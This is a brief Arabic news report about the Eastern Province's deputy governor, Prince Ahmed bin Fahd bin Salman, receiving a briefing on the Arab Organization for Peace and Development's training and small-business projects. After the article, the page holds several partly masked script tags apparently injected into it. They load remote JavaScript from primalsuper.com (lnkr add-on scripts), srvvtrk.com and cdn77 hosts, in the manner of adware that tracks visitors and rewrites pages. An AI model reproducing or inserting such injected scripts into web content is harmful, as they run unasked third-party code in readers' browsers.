شكرا لقرائتكم خبر عن الأمير أحمد بن فهد بن سلمان يطلع على مشاريع المنظمة العربية للسلام والتنمية والان نبدء بالتفاصيل
واستمع سموه إلى شرح عن أهداف وخطط المنظمة حول الموضوعات ذات الصلة بالسلام والتنمية، والانجازات التي حققتها والبرامج الاستراتيجية مع الشركاء للمنظمة في مجال التدريب والتأهيل والتطوير وإيجاد تنمية مستدامة، بالإضافة إلى خططها في إنشاء مشاريع اقتصادية عبارة عن مشاريع صغيرة ومتوسطة، وإمكانية التعاون المشترك بين المنظمة والجمعيات والمؤسسات في المنطقة الشرقية، مشيداً سموه بما تبذله المنظمة من جهود في هذا المجال.
وثمنت د. مشاعل العتيبي ، جهود سمو نائب أمير المنطقة الشرقية لتطور وازدهار المنطقة في شتى المجالات وخاصة في القطاع التنموي، ومانتج عنه من مبادرات اجتماعية لتعزيز المشاريع الاقتصادية الصغيرة والمتوسطة ذات الفائدة، والتي أسهمت في إبراز المنطقة وتجربتها في هذا المجال لخدمة شباب وشابات المنطقة من خلال توفير فرص دخول سوق العمل الحر. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_371260735&key=1fd3b038f796d0b159&cv=1549460675&t=1549460675379" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_885604151&key=1fd3b038f796d0b159&cv=10270&t=1549460675381" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460675384" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********
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